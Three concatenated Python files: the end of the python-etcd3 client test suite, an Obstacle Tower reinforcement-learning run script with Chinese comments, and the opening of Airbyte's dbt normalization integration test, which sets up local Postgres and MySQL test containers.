assert event.value != utils.to_bytes('3')
change_count += 1
if change_count > 2:
# if cancel not work, we will block in this for-loop forever
cancel()
t.join()
def test_watch_prefix_callback(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/callback/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/callback/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def update_key():
# sleep to make watch can get the event
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
events = []
def callback(event):
events.extend(event.events)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
watch_id = etcd.add_watch_prefix_callback(
'/doot/watch/prefix/callback/', callback)
t.join()
etcd.cancel_watch(watch_id)
assert len(events) == 2
assert events[0].key.decode() == '/doot/watch/prefix/callback/0'
assert events[0].value.decode() == '0'
assert events[1].key.decode() == '/doot/watch/prefix/callback/1'
assert events[1].value.decode() == '1'
def test_watch_prefix_callback_with_filter(self, etcd):
def update_etcd(v):
etcdctl('put', '/doot/watch/prefix/callback/' + v, v)
out = etcdctl('get', '/doot/watch/prefix/callback/' + v)
assert base64.b64decode(out['kvs'][0]['value']) == \
utils.to_bytes(v)
def delete_etcd(v):
etcdctl('del', '/doot/watch/prefix/callback/' + v)
def update_key():
time.sleep(3)
update_etcd('0')
time.sleep(1)
update_etcd('1')
time.sleep(1)
delete_etcd('1')
time.sleep(1)
events = []
def callback(event):
events.extend(event.events)
t = threading.Thread(name="update_key_prefix", target=update_key)
t.start()
watch_id = etcd.add_watch_prefix_callback(
'/doot/watch/prefix/callback/',
callback,
filters=[etcdrpc.WatchCreateRequest.FilterType.Value('NODELETE')]
)
t.join()
etcd.cancel_watch(watch_id)
assert len(events) == 2
assert events[0].key.decode() == '/doot/watch/prefix/callback/0'
assert events[0].value.decode() == '0'
assert events[1].key.decode() == '/doot/watch/prefix/callback/1'
assert events[1].value.decode() == '1'
def test_sequential_watch_prefix_once(self, etcd):
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
try:
etcd.watch_prefix_once('/doot/', 1)
except etcd3.exceptions.WatchTimedOut:
pass
def test_watch_responses(self, etcd):
# Test watch_response & watch_once_response
revision = etcd.put('/doot/watch', '0').header.revision
etcd.put('/doot/watch', '1')
responses_iterator, cancel = \
etcd.watch_response('/doot/watch', start_revision=revision)
response_1 = next(responses_iterator)
cancel()
response_2 = etcd.watch_once_response('/doot/watch',
start_revision=revision)
for response in [response_1, response_2]:
count = 0
# check that the response contains the etcd revision
assert response.header.revision > 0
assert len(response.events) == 2
for event in response.events:
assert event.key == b'/doot/watch'
assert event.value == utils.to_bytes(str(count))
count += 1
# Test watch_prefix_response & watch_prefix_once_response
success_ops = [etcd.transactions.put('/doot/watch/prefix/0', '0'),
etcd.transactions.put('/doot/watch/prefix/1', '1')]
revision = etcd.transaction([], success_ops,
[])[1][0].response_put.header.revision
responses_iterator, cancel = \
etcd.watch_prefix_response('/doot/watch/prefix/',
start_revision=revision)
response_1 = next(responses_iterator)
cancel()
response_2 = etcd.watch_prefix_once_response('/doot/watch/prefix/',
start_revision=revision)
for response in [response_1, response_2]:
count = 0
assert response.header.revision == revision
assert len(response.events) == 2
for event in response.events:
assert event.key == \
utils.to_bytes('/doot/watch/prefix/{}'.format(count))
assert event.value == utils.to_bytes(str(count))
count += 1
def test_transaction_success(self, etcd):
etcdctl('put', '/doot/txn', 'dootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'success'
def test_transaction_failure(self, etcd):
etcdctl('put', '/doot/txn', 'notdootdoot')
etcd.transaction(
compare=[etcd.transactions.value('/doot/txn') == 'dootdoot'],
success=[etcd.transactions.put('/doot/txn', 'success')],
failure=[etcd.transactions.put('/doot/txn', 'failure')]
)
out = etcdctl('get', '/doot/txn')
assert base64.b64decode(out['kvs'][0]['value']) == b'failure'
def test_ops_to_requests(self, etcd):
with pytest.raises(Exception):
etcd._ops_to_requests(['not_transaction_type'])
with pytest.raises(TypeError):
etcd._ops_to_requests(0)
@pytest.mark.skipif(etcd_version < 'v3.3',
reason="requires etcd v3.3 or higher")
def test_nested_transactions(self, etcd):
etcd.transaction(
compare=[],
success=[etcd.transactions.put('/doot/txn1', '1'),
etcd.transactions.txn(
compare=[],
success=[etcd.transactions.put('/doot/txn2', '2')],
failure=[])],
failure=[]
)
value, _ = etcd.get('/doot/txn1')
assert value == b'1'
value, _ = etcd.get('/doot/txn2')
assert value == b'2'
@pytest.mark.skipif(etcd_version < 'v3.3',
reason="requires etcd v3.3 or higher")
def test_transaction_range_conditions(self, etcd):
etcdctl('put', '/doot/key1', 'dootdoot')
etcdctl('put', '/doot/key2', 'notdootdoot')
range_end = utils.prefix_range_end(utils.to_bytes('/doot/'))
compare = [etcd.transactions.value('/doot/', range_end) == 'dootdoot']
status, _ = etcd.transaction(compare=compare, success=[], failure=[])
assert not status
etcdctl('put', '/doot/key2', 'dootdoot')
status, _ = etcd.transaction(compare=compare, success=[], failure=[])
assert status
def test_replace_success(self, etcd):
etcd.put('/doot/thing', 'toot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'doot'
assert status is True
def test_replace_fail(self, etcd):
etcd.put('/doot/thing', 'boot')
status = etcd.replace('/doot/thing', 'toot', 'doot')
v, _ = etcd.get('/doot/thing')
assert v == b'boot'
assert status is False
def test_get_prefix(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
values = list(etcd.get_prefix('/doot/range'))
assert len(values) == 20
for value, _ in values:
assert value == b'i am a range'
def test_get_prefix_keys_only(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
values = list(etcd.get_prefix('/doot/range', keys_only=True))
assert len(values) == 20
for value, meta in values:
assert meta.key.startswith(b"/doot/range")
assert not value
def test_get_prefix_serializable(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am a range')
with _out_quorum():
values = list(etcd.get_prefix(
'/doot/range', keys_only=True, serializable=True))
assert len(values) == 20
def test_get_prefix_error_handling(self, etcd):
with pytest.raises(TypeError, match="Don't use "):
etcd.get_prefix('a_prefix', range_end='end')
def test_get_range(self, etcd):
for char in string.ascii_lowercase:
if char < 'p':
etcdctl('put', '/doot/' + char, 'i am in range')
else:
etcdctl('put', '/doot/' + char, 'i am not in range')
values = list(etcd.get_range('/doot/a', '/doot/p'))
assert len(values) == 15
for value, _ in values:
assert value == b'i am in range'
def test_all_not_found_error(self, etcd):
result = list(etcd.get_all())
assert not result
def test_range_not_found_error(self, etcd):
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am a not range')
result = list(etcd.get_prefix('/doot/range'))
assert not result
def test_get_all(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')
values = list(etcd.get_all())
assert len(values) == 25
for value, _ in values:
assert value == b'i am in all'
def test_get_all_keys_only(self, etcd):
for i in range(20):
etcdctl('put', '/doot/range{}'.format(i), 'i am in all')
for i in range(5):
etcdctl('put', '/doot/notrange{}'.format(i), 'i am in all')
values = list(etcd.get_all(keys_only=True))
assert len(values) == 25
for value, meta in values:
assert meta.key.startswith(b"/doot/")
assert not value
def test_sort_order(self, etcd):
def remove_prefix(string, prefix):
return string[len(prefix):]
initial_keys = 'abcde'
initial_values = 'qwert'
for k, v in zip(initial_keys, initial_values):
etcdctl('put', '/doot/{}'.format(k), v)
keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='ascend'):
keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert keys == initial_keys
reverse_keys = ''
for value, meta in etcd.get_prefix('/doot', sort_order='descend'):
reverse_keys += remove_prefix(meta.key.decode('utf-8'), '/doot/')
assert reverse_keys == ''.join(reversed(initial_keys))
def test_get_response(self, etcd):
etcdctl('put', '/foo/key1', 'value1')
etcdctl('put', '/foo/key2', 'value2')
response = etcd.get_response('/foo/key1')
assert response.header.revision > 0
assert response.count == 1
assert response.kvs[0].key == b'/foo/key1'
assert response.kvs[0].value == b'value1'
response = etcd.get_prefix_response('/foo/', sort_order='ascend')
assert response.header.revision > 0
assert response.count == 2
assert response.kvs[0].key == b'/foo/key1'
assert response.kvs[0].value == b'value1'
assert response.kvs[1].key == b'/foo/key2'
assert response.kvs[1].value == b'value2'
# Test that the response header is accessible even when the
# requested key or range of keys does not exist
etcdctl('del', '--prefix', '/foo/')
response = etcd.get_response('/foo/key1')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_prefix_response('/foo/')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_range_response('/foo/key1', '/foo/key3')
assert response.count == 0
assert response.header.revision > 0
response = etcd.get_all_response()
assert response.count == 0
assert response.header.revision > 0
def test_lease_grant(self, etcd):
lease = etcd.lease(1)
assert isinstance(lease.ttl, int_types)
assert isinstance(lease.id, int_types)
def test_lease_revoke(self, etcd):
lease = etcd.lease(1)
lease.revoke()
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_keys_empty(self, etcd):
lease = etcd.lease(1)
assert lease.keys == []
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_single_key(self, etcd):
lease = etcd.lease(1)
etcd.put('/doot/lease_test', 'this is a lease', lease=lease)
assert lease.keys == [b'/doot/lease_test']
@pytest.mark.skipif(etcd_version.startswith('v3.0'),
reason="requires etcd v3.1 or higher")
def test_lease_expire(self, etcd):
key = '/doot/lease_test_expire'
lease = etcd.lease(1)
etcd.put(key, 'this is a lease', lease=lease)
assert lease.keys == [utils.to_bytes(key)]
v, _ = etcd.get(key)
assert v == b'this is a lease'
assert lease.remaining_ttl <= lease.granted_ttl
# wait for the lease to expire
time.sleep(lease.granted_ttl + 2)
v, _ = etcd.get(key)
assert v is None
def test_member_list(self, etcd):
assert len(list(etcd.members)) == 3
for member in etcd.members:
assert member.name.startswith('pifpaf')
for peer_url in member.peer_urls:
assert peer_url.startswith('http://')
for client_url in member.client_urls:
assert client_url.startswith('http://')
assert isinstance(member.id, int_types) is True
def test_lock_acquire(self, etcd):
lock = etcd.lock('lock-1', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.acquire(timeout=0) is False
assert lock.acquire(timeout=1) is False
def test_lock_release(self, etcd):
lock = etcd.lock('lock-2', ttl=10)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
assert lock.release() is True
v, _ = etcd.get(lock.key)
assert v is None
assert lock.acquire() is True
assert lock.release() is True
assert lock.acquire(timeout=None) is True
def test_lock_expire(self, etcd):
lock = etcd.lock('lock-3', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# wait for the lease to expire
time.sleep(9)
v, _ = etcd.get(lock.key)
assert v is None
def test_lock_refresh(self, etcd):
lock = etcd.lock('lock-4', ttl=3)
assert lock.acquire() is True
assert etcd.get(lock.key)[0] is not None
# sleep for the same total time as test_lock_expire, but refresh each
# second
for _ in range(9):
time.sleep(1)
lock.refresh()
assert etcd.get(lock.key)[0] is not None
def test_lock_is_acquired(self, etcd):
lock1 = etcd.lock('lock-5', ttl=2)
assert lock1.is_acquired() is False
lock2 = etcd.lock('lock-5', ttl=2)
lock2.acquire()
assert lock2.is_acquired() is True
lock2.release()
lock3 = etcd.lock('lock-5', ttl=2)
lock3.acquire()
assert lock3.is_acquired() is True
assert lock2.is_acquired() is False
def test_lock_context_manager(self, etcd):
with etcd.lock('lock-6', ttl=2) as lock:
assert lock.is_acquired() is True
assert lock.is_acquired() is False
def test_lock_contended(self, etcd):
lock1 = etcd.lock('lock-7', ttl=2)
lock1.acquire()
lock2 = etcd.lock('lock-7', ttl=2)
lock2.acquire()
assert lock1.is_acquired() is False
assert lock2.is_acquired() is True
def test_lock_double_acquire_release(self, etcd):
lock = etcd.lock('lock-8', ttl=10)
assert lock.acquire(0) is True
assert lock.acquire(0) is False
assert lock.release() is True
def test_lock_acquire_none(self, etcd):
lock = etcd.lock('lock-9', ttl=10)
assert lock.acquire(None) is True
# This will succeed after 10 seconds since the TTL will expire and the
# lock is not refreshed
assert lock.acquire(None) is True
def test_lock_acquire_with_timeout(self, etcd):
lock1 = etcd.lock('lock-10', ttl=10)
lock2 = etcd.lock('lock-10', ttl=10)
original_watch = etcd.watch
watch_called = [0]
def release_lock_before_watch(*args, **kwargs):
watch_called[0] += 1
# Simulates the case where key is expired before watch is called.
# See https://github.com/kragniz/python-etcd3/issues/1107
lock1.release()
return original_watch(*args, **kwargs)
original_transaction = etcd.transaction
transaction_called = [0]
def transaction_wrapper(*args, **kwargs):
transaction_called[0] += 1
return original_transaction(*args, **kwargs)
assert lock1.acquire() is True
with mock.patch.object(etcd3.Etcd3Client, 'watch',
wraps=release_lock_before_watch):
with mock.patch.object(etcd3.Etcd3Client, 'transaction',
wraps=transaction_wrapper):
assert lock2.acquire(timeout=5) is True
# watch must be called only for lock2 once
assert watch_called[0] == 1
# transaction must be called once for lock1, twice for lock2
assert transaction_called[0] == 3
def test_internal_exception_on_internal_error(self, etcd):
exception = self.MockedException(grpc.StatusCode.INTERNAL)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.InternalServerError):
etcd.get("foo")
def test_connection_failure_exception_on_connection_failure(self, etcd):
exception = self.MockedException(grpc.StatusCode.UNAVAILABLE)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionFailedError):
etcd.get("foo")
def test_connection_timeout_exception_on_connection_timeout(self, etcd):
exception = self.MockedException(grpc.StatusCode.DEADLINE_EXCEEDED)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(etcd3.exceptions.ConnectionTimeoutError):
etcd.get("foo")
def test_grpc_exception_on_unknown_code(self, etcd):
exception = self.MockedException(grpc.StatusCode.DATA_LOSS)
kv_mock = mock.MagicMock()
kv_mock.Range.side_effect = exception
etcd.kvstub = kv_mock
with pytest.raises(grpc.RpcError):
etcd.get("foo")
def test_status_member(self, etcd):
status = etcd.status()
assert isinstance(status.leader, etcd3.members.Member) is True
assert status.leader.id in [m.id for m in etcd.members]
def test_hash(self, etcd):
assert isinstance(etcd.hash(), int)
def test_snapshot(self, etcd):
with tempfile.NamedTemporaryFile() as f:
etcd.snapshot(f)
f.flush()
etcdctl('snapshot', 'status', f.name)
class TestAlarms(object):
@pytest.fixture
def etcd(self):
etcd = etcd3.client()
yield etcd
etcd.disarm_alarm()
for m in etcd.members:
if m.active_alarms:
etcd.disarm_alarm(m.id)
def test_create_alarm_all_members(self, etcd):
alarms = etcd.create_alarm()
assert len(alarms) == 1
assert alarms[0].member_id == 0
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_create_alarm_specific_member(self, etcd):
a_member = next(etcd.members)
alarms = etcd.create_alarm(member_id=a_member.id)
assert len(alarms) == 1
assert alarms[0].member_id == a_member.id
assert alarms[0].alarm_type == etcdrpc.NOSPACE
def test_list_alarms(self, etcd):
a_member = next(etcd.members)
etcd.create_alarm()
etcd.create_alarm(member_id=a_member.id)
possible_member_ids = [0, a_member.id]
alarms = list(etcd.list_alarms())
assert len(alarms) == 2
for alarm in alarms:
possible_member_ids.remove(alarm.member_id)
assert alarm.alarm_type == etcdrpc.NOSPACE
assert possible_member_ids == []
def test_disarm_alarm(self, etcd):
etcd.create_alarm()
assert len(list(etcd.list_alarms())) == 1
etcd.disarm_alarm()
assert len(list(etcd.list_alarms())) == 0
class TestUtils(object):
def test_prefix_range_end(self):
assert etcd3.utils.prefix_range_end(b'foo') == b'fop'
assert etcd3.utils.prefix_range_end(b'ab\xff') == b'ac\xff'
assert (etcd3.utils.prefix_range_end(b'a\xff\xff\xff\xff\xff')
== b'b\xff\xff\xff\xff\xff')
def test_to_bytes(self):
assert isinstance(etcd3.utils.to_bytes(b'doot'), bytes) is True
assert isinstance(etcd3.utils.to_bytes('doot'), bytes) is True
assert etcd3.utils.to_bytes(b'doot') == b'doot'
assert etcd3.utils.to_bytes('doot') == b'doot'
class TestEtcdTokenCallCredentials(object):
def test_token_callback(self):
e = EtcdTokenCallCredentials('foo')
callback = mock.MagicMock()
e(None, callback)
metadata = (('token', 'foo'),)
callback.assert_called_once_with(metadata, None)
class TestClient(object):
@pytest.fixture
def etcd(self):
yield etcd3.client()
def test_sort_target(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.KEY,
'key': etcdrpc.RangeRequest.KEY,
'version': etcdrpc.RangeRequest.VERSION,
'create': etcdrpc.RangeRequest.CREATE,
'mod': etcdrpc.RangeRequest.MOD,
'value': etcdrpc.RangeRequest.VALUE,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_target=input)
assert range_request.sort_target == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_target='feelsbadman')
def test_sort_order(self, etcd):
key = 'key'.encode('utf-8')
sort_target = {
None: etcdrpc.RangeRequest.NONE,
'ascend': etcdrpc.RangeRequest.ASCEND,
'descend': etcdrpc.RangeRequest.DESCEND,
}
for input, expected in sort_target.items():
range_request = etcd._build_get_range_request(key,
sort_order=input)
assert range_request.sort_order == expected
with pytest.raises(ValueError):
etcd._build_get_range_request(key, sort_order='feelsbadman')
def test_secure_channel(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key="tests/client.key",
cert_cert="tests/client.crt"
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_only(self):
client = etcd3.client(
ca_cert="tests/ca.crt",
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is True
def test_secure_channel_ca_cert_and_key_raise_exception(self):
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key='tests/client.crt',
cert_cert=None)
with pytest.raises(ValueError):
etcd3.client(
ca_cert='tests/ca.crt',
cert_key=None,
cert_cert='tests/client.crt')
def test_compact(self, etcd):
etcd.compact(3)
with pytest.raises(grpc.RpcError):
etcd.compact(3)
def test_channel_with_no_cert(self):
client = etcd3.client(
ca_cert=None,
cert_key=None,
cert_cert=None
)
assert client.uses_secure_channel is False
@mock.patch('etcdrpc.AuthStub')
def test_user_pwd_auth(self, auth_mock):
auth_resp_mock = mock.MagicMock()
auth_resp_mock.token = 'foo'
auth_mock.Authenticate = auth_resp_mock
self._enable_auth_in_etcd()
# Create a client using username and password auth
client = etcd3.client(
user='root',
password='pwd'
)
assert client.call_credentials is not None
self._disable_auth_in_etcd()
def test_user_or_pwd_auth_raises_exception(self):
with pytest.raises(Exception):
etcd3.client(user='usr')
with pytest.raises(Exception):
etcd3.client(password='pwd')
def _enable_auth_in_etcd(self):
subprocess.call(['etcdctl', '-w', 'json', 'user', 'add', 'root:pwd'])
subprocess.call(['etcdctl', 'auth', 'enable'])
def _disable_auth_in_etcd(self):
subprocess.call(['etcdctl', 'user', 'remove', 'root'])
subprocess.call(['etcdctl', '-u', 'root:pwd', 'auth', 'disable'])
class TestCompares(object):
def test_compare_version(self):
key = 'key'
tx = etcd3.Transactions()
version_compare = tx.version(key) == 1
assert version_compare.op == etcdrpc.Compare.EQUAL
version_compare = tx.version(key) != 2
assert version_compare.op == etcdrpc.Compare.NOT_EQUAL
version_compare = tx.version(key) < 91
assert version_compare.op == etcdrpc.Compare.LESS
version_compare = tx.version(key) > 92
assert version_compare.op == etcdrpc.Compare.GREATER
assert version_compare.build_message().target == \
etcdrpc.Compare.VERSION
def test_compare_value(self):
key = 'key'
tx = etcd3.Transactions()
value_compare = tx.value(key) == 'b'
assert value_compare.op == etcdrpc.Compare.EQUAL
value_compare = tx.value(key) != 'b'
assert value_compare.op == etcdrpc.Compare.NOT_EQUAL
value_compare = tx.value(key) < 'b'
assert value_compare.op == etcdrpc.Compare.LESS
value_compare = tx.value(key) > 'b'
assert value_compare.op == etcdrpc.Compare.GREATER
assert value_compare.build_message().target == etcdrpc.Compare.VALUE
def test_compare_mod(self):
key = 'key'
tx = etcd3.Transactions()
mod_compare = tx.mod(key) == -100
assert mod_compare.op == etcdrpc.Compare.EQUAL
mod_compare = tx.mod(key) != -100
assert mod_compare.op == etcdrpc.Compare.NOT_EQUAL
mod_compare = tx.mod(key) < 19
assert mod_compare.op == etcdrpc.Compare.LESS
mod_compare = tx.mod(key) > 21
assert mod_compare.op == etcdrpc.Compare.GREATER
assert mod_compare.build_message().target == etcdrpc.Compare.MOD
def test_compare_create(self):
key = 'key'
tx = etcd3.Transactions()
create_compare = tx.create(key) == 10
assert create_compare.op == etcdrpc.Compare.EQUAL
create_compare = tx.create(key) != 10
assert create_compare.op == etcdrpc.Compare.NOT_EQUAL
create_compare = tx.create(key) < 155
assert create_compare.op == etcdrpc.Compare.LESS
create_compare = tx.create(key) > -12
assert create_compare.op == etcdrpc.Compare.GREATER
assert create_compare.build_message().target == etcdrpc.Compare.CREATE
|
kprun.py
|
from obstacle_tower_env import ObstacleTowerEnv
# 參數設定檔
# from keepitpossible.common import gcp_parameters
from keepitpossible.common import pc_parameters
# RL模型
from keepitpossible.model import dppo_model
from keepitpossible.model import ex_dppo_model
# 多工
from keepitpossible import dppo_worker
import numpy as np
import tensorflow as tf
import os
import threading
import queue
# 使用第一張GPU 卡 1080
os.environ["CUDA_VISIBLE_DEVICES"] = "0"
# TF_CPP_MIN_LOG_LEVEL, 1隱藏通知, 2隱藏通知和警告, 3隱藏通知、警告和錯誤
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '1'
class KPRUN(object):
def __init__(self):
# SCHEDUL參數
# N_WORKER:設置幾個代理 預設:4
# EP_LEN:代理人自己更新的步數 預設:500
# EP_MAX:最大訓練回合數(每個代理人加起來的回合) 預設:4000
# ENV_SEED:隨機種子 預設:np.random.randint(5)
# ENV_FLOOR:起始樓層 預設:0
# LESSON_END:課程完成終止樓層 預設:5
self.SCHEDULE = pc_parameters.SCHEDULE(N_WORKER=4,
EP_MAX=40000,
LESSON_END=0)
self.PARAMETERS = pc_parameters.PARAMETERS()
self.MODEL = ex_dppo_model.DPPOMODEL(GLOBAL_SHARE=self,
PARAMETERS=self.PARAMETERS,
SCHEDULE=self.SCHEDULE)
# 多工共享資源
self.UPDATE_COUNTER = 0
self.REWARD_AVERAGE = []
self.EP = 0
self.QUEUE = queue.Queue()
self.COORD = tf.train.Coordinator()
# 建立多工事件
self.UPDATE_EVENT = threading.Event()
self.ROLLING_EVENT = threading.Event()
def train(self):
self.UPDATE_EVENT.clear()
self.ROLLING_EVENT.set()
self.MODEL.load()
# 建立多工物件
workers = [dppo_worker.Worker(GLOBAL_SHARE=self,
PARAMETERS=self.PARAMETERS,
SCHEDULE=self.SCHEDULE,
wid=i,
retro=False,
realtime_mode=False,
) for i in range(self.SCHEDULE.N_WORKER)]
# 執行多工任務
threads = []
for worker in workers: # worker threads
t = threading.Thread(target=worker.work, args=())
t.start() # training
threads.append(t)
# 建立模型更新的執行緒
threads.append(threading.Thread(target=self.MODEL.update, ))
threads[-1].start()
self.COORD.join(threads)
# 儲存模型
self.MODEL.save()
# 測試
self.testing()
def grading(self, env):
done = False
reward = 0.0
env.seed(np.random.randint(100))
obs = env.reset()
previous_preprocessed_observation_image = obs[0]
while not done:
action = env.action_space.sample(
previous_preprocessed_observation_image)
observation, reward, done, info = env.step(action)
# 預處理模型需要的資料
observation_image, keys, time_remaining = observation
previous_preprocessed_observation_image = observation_image
env.reset()
return reward
def testing(self):
from keepitpossible.common import action_table
self.table_action = action_table.create_action_table()
self.MODEL.load()
done = False
reward = 0.0
env = ObstacleTowerEnv(environment_filename=self.SCHEDULE.ENV_PATH,
worker_id=self.SCHEDULE.N_WORKER + 1,
retro=False,
realtime_mode=True)
obs = env.reset()
previous_preprocessed_observation_image = obs[0]
while not done:
action = self.MODEL.choose_action(
previous_preprocessed_observation_image)
# 做出動作,獲得場景資訊,已過關數,代理資訊
for _ in self.table_action[int(action)]:
observation, reward, done, info = env.step(_)
print(
"Action_Chose: ",
action,
"Action: ",
_,
" Reward: ",
reward)
if done:
break
# 預處理模型需要的資料
observation_image, keys, time_remaining = observation
preprocessed_observation_image = observation_image
previous_preprocessed_observation_image = preprocessed_observation_image
env.close()
if __name__ == '__main__':
kp_run = KPRUN()
kp_run.testing()
|
dbt_integration_test.py
|
#
# MIT License
#
# Copyright (c) 2020 Airbyte
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import json
import os
import random
import re
import shutil
import socket
import string
import subprocess
import sys
import threading
import time
from typing import Any, Dict, List
from normalization.destination_type import DestinationType
from normalization.transform_config.transform import TransformConfig
class DbtIntegrationTest(object):
def __init__(self):
self.target_schema = "test_normalization"
self.container_prefix = f"test_normalization_db_{self.random_string(3)}"
self.db_names = ["postgres", "mysql"]
@staticmethod
def random_string(length: int) -> str:
return "".join(random.choice(string.ascii_lowercase) for i in range(length))
def setup_db(self):
self.setup_postgres_db()
self.setup_mysql_db()
def setup_postgres_db(self):
print("Starting localhost postgres container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"username": "integration-tests",
"password": "integration-tests",
"port": port,
"database": "postgres",
"schema": self.target_schema,
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_postgres",
"-e",
f"POSTGRES_USER={config['username']}",
"-e",
f"POSTGRES_PASSWORD={config['password']}",
"-p",
f"{config['port']}:5432",
"-d",
"postgres",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/postgres.json", "w") as fh:
fh.write(json.dumps(config))
def setup_mysql_db(self):
print("Starting localhost mysql container for tests")
port = self.find_free_port()
config = {
"host": "localhost",
"port": port,
"database": self.target_schema,
"username": "root",
"password": "",
}
commands = [
"docker",
"run",
"--rm",
"--name",
f"{self.container_prefix}_mysql",
"-e",
"MYSQL_ALLOW_EMPTY_PASSWORD=yes",
"-e",
"MYSQL_INITDB_SKIP_TZINFO=yes",
"-e",
f"MYSQL_DATABASE={config['database']}",
"-p",
f"{config['port']}:3306",
"-d",
"mysql",
]
print("Executing: ", " ".join(commands))
subprocess.call(commands)
time.sleep(120)
if not os.path.exists("../secrets"):
os.makedirs("../secrets")
with open("../secrets/mysql.json", "w") as fh:
fh.write(json.dumps(config))
@staticmethod
def find_free_port():
"""
Find an unused port to create a database listening on localhost to run destination-postgres
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
addr = s.getsockname()
s.close()
return addr[1]
def tear_down_db(self):
for db_name in self.db_names:
print(f"Stopping localhost {db_name} container for tests")
try:
subprocess.call(["docker", "kill", f"{self.container_prefix}_{db_name}"])
except Exception as e:
print(f"WARN: Exception while shutting down {db_name}: {e}")
@staticmethod
def change_current_test_dir(request):
# This makes the test run whether it is executed from the tests folder (with pytest/gradle)
# or from the base-normalization folder (through pycharm)
integration_tests_dir = os.path.join(request.fspath.dirname, "integration_tests")
if os.path.exists(integration_tests_dir):
os.chdir(integration_tests_dir)
else:
os.chdir(request.fspath.dirname)
def generate_project_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
config_generator = TransformConfig()
project_yaml = config_generator.transform_dbt_project(destination_type)
config_generator.write_yaml_config(test_root_dir, project_yaml, "dbt_project.yml")
return project_yaml
def generate_profile_yaml_file(self, destination_type: DestinationType, test_root_dir: str) -> Dict[str, Any]:
"""
Each destination requires different settings to connect to. This step generates the adequate profiles.yml
as described here: https://docs.getdbt.com/reference/profiles.yml
"""
config_generator = TransformConfig()
profiles_config = config_generator.read_json_config(f"../secrets/{destination_type.value.lower()}.json")
# Adapt credential file to look like destination config.json
if destination_type.value == DestinationType.BIGQUERY.value:
credentials = profiles_config
profiles_config = {
"credentials_json": json.dumps(credentials),
"dataset_id": self.target_schema,
"project_id": credentials["project_id"],
}
elif destination_type.value == DestinationType.MYSQL.value:
profiles_config["database"] = self.target_schema
else:
profiles_config["schema"] = self.target_schema
profiles_yaml = config_generator.transform(destination_type, profiles_config)
